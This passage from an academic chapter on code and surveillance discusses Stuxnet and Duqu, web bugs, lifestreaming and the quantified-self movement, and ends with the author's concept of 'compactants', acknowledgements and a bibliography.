&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. The analysis performed by Langner (2011) and others, was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus (see Sanger, 2012). Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
  [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Lastly, I want to connect these developments in web-bugs and worms with the growth in the use of self-monitoring technologies called lifestreaming, or the notion of the quantified self.[11] These have expanded in recent years as the ‘real-time streams’ platforms have expanded, like Twitter and Facebook. Indeed, some argue that ‘we’re finally in a position where people volunteer information about their specific activities, often their location, who they’re&amp;amp;nbsp;with, what they’re doing, how they feel about what they’re doing, what they’re talking about…We’ve never had data like that before, at least not at that level of granularity’ (Rieland, 2012). This has been usefully described by the ''Economist'', who argue that the:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;idea of measuring things to chart progress towards a goal is commonplace in large organisations. Governments tot up trade figures, hospital waiting times and exam results; companies measure their turnover, profits and inventory. But the use of metrics by individuals is rather less widespread, with the notable exceptions of people who are trying to lose weight or improve their fitness…But some people are doing just these things. They are an eclectic mix of early adopters, fitness freaks, technology evangelists, personal-development junkies, hackers and patients suffering from a wide variety of health problems. What they share is a belief that gathering and analysing data about their everyday activities can help them improve their lives—an approach known as 'self-tracking', 'body hacking' or 'self-quantifying'. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This phenomena of using computational devices to monitor health signals and to feed them back into calculative interfaces, data visualisations, real-time streams, etc. is the next step in social media. This closes the loop of personal information online, which, although it remains notionally private, is stored and accessed by corporations who wish to use this biodata for data mining and innovation surfacing. For example:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;The Zeo [headband]... has already generated the largest-ever database on sleep stages, which revealed differences between men and women in REM-sleep quantity. Asthmapolis also hopes to pool data from thousands of inhalers fitted with its Spiroscout [asthma inhaler] sensor in an effort to improve the management of asthma. And data from the Boozerlyzer [alcohol counting] app is anonymised and aggregated to investigate the variation in people’s response to alcohol. (Economist, 2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Lifestreams were originally an idea from David Gelernter and Eric Freeman in the 1990s (Freeman, 1997; Gelernter, 2010), which they described as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;a time-ordered stream of documents that functions as a diary of your electronic life; every document you create and every document other people send you is stored in your lifestream. The tail of your stream contains documents from the past (starting with your electronic birth certificate). Moving away from the tail and toward the present, your stream contains more recent documents -- papers in progress or new electronic mail; other documents (pictures, correspondence, bills, movies, voice mail, software) are stored in between. Moving beyond the present and into the future, the stream contains documents you ''will'' need: reminders, calendar items, to-do lists. You manage your lifestream through a small number of powerful operators that allow you to transparently store information, organize information on demand, filter and monitor incoming information, create reminders and calendar items in an integrated fashion, and 'compress' large numbers of documents into overviews or executive summaries. (Freeman, 2000)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Gelernter originally described these ‘chronicle streams’ (Gelernter, 1994), highlighting both their narrative and temporal dimensions related to the storage of documentation and texts. Today we are more likely to think of them as ‘real-time streams’ and the timeline functions offered by systems like Twitter, Facebook and Google+. These are increasingly the model of interface design that is driving the innovation in computation, especially in mobile and locative technologies. However, in contrast to the document-centric model that Gelernter and Freeman were describing, there are also the micro-streams of short updates, epitomized by Twitter, which has short text-message sized 140 character updates. Nonetheless this is still enough text space to incorporate a surprising amount of data, particularly when geo, image, weblinks, and so forth are factored in. Stephen Wolfram was one of the first people to collect their data systematically.&amp;amp;nbsp;As he explains, Wolfram started in 1989: 'So email is one kind of data I’ve systematically archived. And there’s a huge amount that can be learned from that.&amp;amp;nbsp;Another kind of data that I’ve been collecting is keystrokes. For many years, I’ve captured every keystroke I’ve typed—now more than 100 million of them' (Wolfram, 2012). &amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; This kind of self-collection of data is certainly becoming more prevalent and in the context of reflexivity and self-knowledge, it raises interesting questions about the increasing use of mathematics and computation to understand and control the self. The scale of data that is collected can also be relatively large and unstructured. Nonetheless, better data management and techniques for searching and surfacing information from unstructured or semi-structured data will no doubt be revealing about our everyday patterns in the future.[12]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Mobile 'apps' - small, relatively contained applications that usually perform a single specific function - have accelerated this way of collecting and sending data. For example, the Twitter app on the iPhone allows the user to send updates to their timeline, but also search other timelines, check out profiles, streams and so on. When created as apps, however, they are also able to use the power of the local device, especially if it contains the kinds of sophisticated sensory circuitry that is common in smartphones, to log GPS geographic location, direction, etc. This is when life-streaming becomes increasingly similar to the activity of web bugs in monitoring and collecting data on the users that are active on the network. Indeed, activity streams have become a standard which is increasingly being incorporated into software across a number of media and software practices (see ActivityStreams n.d.). An activity stream essentially encodes a user event or activity into a form that can be computationally transmitted and later aggregated, searched and processed: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
*In its simplest form, an activity consists of an ''actor'', a ''verb'', an ''object'', and a ''target''. It tells the story of a person performing an action on or with an object -- 'Geraldine posted a photo to her album' or 'John shared a video'. In most cases these components will be explicit, but they may also be implied. (ActivityStreamsWG, 2011, original emphasis)&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
This data and activity collection is only part of the picture, however. In order to become reflexive data it must be computationally processed from its raw state, which may be structured, unstructured, or a combination of the two. At this point it is common for the data to be visualized, usually through a graph or timeline, but there are also techniques such as heat-maps, graph theory, and so forth that enable the data to be processed and reprocessed to tease out patterns in the underlying data set. In both the individual and aggregative use case, in other words for the individual user (or lifestreamer) or organization (such as Facebook), the key is to pattern match and compare details of the data, such as against a norm, a historical data set, or against a population, group, or class or others.[13] &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The patterned usage is therefore a dynamic real-time feedback mechanism, in terms of providing steers for behaviour, norms and so forth, but also offering a documentary narcissism that appears to give the user an existential confirmation and status. Even in its so-called gamification forms, the awarding of competitive points, badges, honours and positional goods more generally is the construction of a hierarchical social structure within the group of users. It also encourages the user to think of themselves as a set of partial objects, fragmented dividuals, or loosely connected properties, collected as a time-series of data-points and subject to intervention and control. This can be thought of as a computational 'care of the self', facilitated by an army of oligopticans (Latour, 2005) in the wider computational environment that observe and store behavioural and affective data. However, this self is reconciled through the code and software that makes the data make sense. The code and software are therefore responsible for creating and maintaining the meaning and narratives through a stabilisation and web of meaning for the actor.[14] &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; I now want to turn to how we might draw these case studies together to think about living in code and software and the implications for wider study in terms of research and theorisation of computational society.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Conclusions'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
It seems that a thread runs through web bugs, viruses and now life-streaming itself: this is data collection, monitoring and real-time feedback, whether overt or covert. Whilst we can continue to study these phenomena in isolation, and indeed there can be very productive knowledge generated from this kind of research, it seems to me that we need to attend to the computationality represented in code and software to better understand such software ecologies (Berry, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the most interesting aspects of these systems is that humans in many cases become the vectors that both enable the data transfers and carry the data that fuels the computational economy. Our movements between systems, carrying USB sticks and logging into email accounts and distant networks, creates the channels through which data flows or an infection is spread. The ability of these viruses to take on some of the features of web bugs and learn our habits and preferences in real-time whilst secreting themselves within our computer systems raises important questions, particularly in relation to the complexity and obfuscated nature of the code and its ability to track and collect data surreptitiously. However, users are actively downloading apps that advertise the fact that they collect this data and seem to genuinely find an existential relief or recognition in their movements being recorded and available for later playback or analysis. Web bugs are in many ways life streams - albeit life streams that have not been authorized by the user whom they are monitoring. This collection of what we might call ''compactants'' are designed to ''passive-aggressively'' record data.[15] With the notion of ''compactants'' (computational actants) I want to particularly draw attention to this passive-aggressive feature of computational agents that are collecting information. Both in terms of their passive quality – under the surface, relatively benign and silent – but also the fact that they are aggressive in their hoarding of data – monitoring behavioural signals, streams of affectivity and so forth. The word ''compact'' also has useful overtones of having all the necessary components or functions neatly fitted into a small package, and compact as in conciseness in expression. The etymology from the Latin ''compact'' for closely put together, or joined together, also neatly expresses the sense of what web bugs and related technologies are. That is, compactants are interesting in terms of the distributed agency they enable, which can be understood through the notion of ''companion actants'' (see Haraway, 2003).&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Interestingly, compactants are structured in such a way that they can be understood as having a dichotomous structure of data-collection/visualisation, each of which is a specific mode of operation. Naturally, due to the huge quantities of data that is often generated, the computational processing and aggregation is often offloaded to the ‘cloud’, or server computers designed specifically for the task and accessed via networks. Indeed, many viruses, for example, often seek to ‘call home’ to report their status, upload data, or offer the chance of being updated, perhaps to a more aggressive version of themselves or to correct bugs.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the 'future self' will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. I would also like to express my deepest thanks to Michael Najjar for the kind permission to use his work, 'The sublime brain [of Jonathon]', for the cover of the book which represents a neuronal frontal portait of an individual, for more of his excellent work please see [http://www.michaelnajjar.com]. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) 'Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) 'Stuxnet: Computer worm opens new era of warfare', ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) 'Activity Streams', accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) 'JSON Activity Streams 1.0', Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) 'Iran says Stuxnet virus infected 16,000 computers', ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) 'European Watchdog Pushes for Do Not Track Protocol', accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) 'Iran Confirms Stuxnet Worm Halted Centrifuges', ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) 'How Stuxnet Is Rewriting the Cyberterrorism Playbook', ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) 'Stuxnet Myrtus or MyRTUs?', accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) 'A Life Lived in Media', ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) 'Privacy Effects of Web Bugs Amplified by Web 2.0', in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) 'Counting every moment', ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) 'The Web Bug FAQ', accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) 'Duqu Trojan used 'unknown' programming language: Kaspersky', CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) 'How HP bugged e-mail', accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) 'How To Manufacture&amp;amp;nbsp;Desire', ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Frabetti, F. (2010) 'Critical Code Studies', accessed 15/03/2012, http://vimeo.com/16263212 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) 'Dunn grilled by Congress', accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) 'The Lifestreams Software Architecture', Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) 'Welcome to the Yale Lifestreams homepage!', accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) 'Americans Love Google! Americans Hate Google!', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) 'The cyber-road not taken.', ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) 'Time To Start Taking The Internet Seriously', ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) 'The Many Data Hats a Company can Wear', accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) 'Ghostrank Planetary System', accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) 'About Ghostery', accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) 'About ChartBeat', accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) 'Stuxnet/Duqu: The Evolution of Drivers', SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) 'A Declaration of Cyber-War', ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hall, G. (2011) ''Digitize Me, Visualize Me, Search Me'', Open Humanities Press, accessed 02/03/2012, http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) 'Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis', ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) ''New Stuxnet' worm targets companies in Europe', ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu '' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) 'Stuxnet opens cracks in Iran nuclear program', accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) 'Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon', accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2012) 'Display Advertising Technology Landscape', accessed 02/06/2012, http://www.lumapartners.com/resource-center/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) 'I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web', ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) 'In a Computer Worm, a Possible Biblical Clue', ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) 'Stuxnet Under the Microscope', accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) 'The Importance of Philosophy to Engineering', ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) 'User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web', Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) 'The Stuxnet Sting', accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Parikka, J. (2012) ''Medianatures: The Materiality of Information Technology and Electronic Waste'', Open Humanities Press, accessed 01/06/2012, http://www.livingbooksaboutlife.org/books/Medianatures &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Parry, D. (2011) ''Ubiquitous Surveillance'', Open Humanities Press, http://www.livingbooksaboutlife.org/books/Ubiquitous_Surveillance &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) 'Langner’s Stuxnet Deep Dive S4 Video', accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) 'Search Engine Use 2012', accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
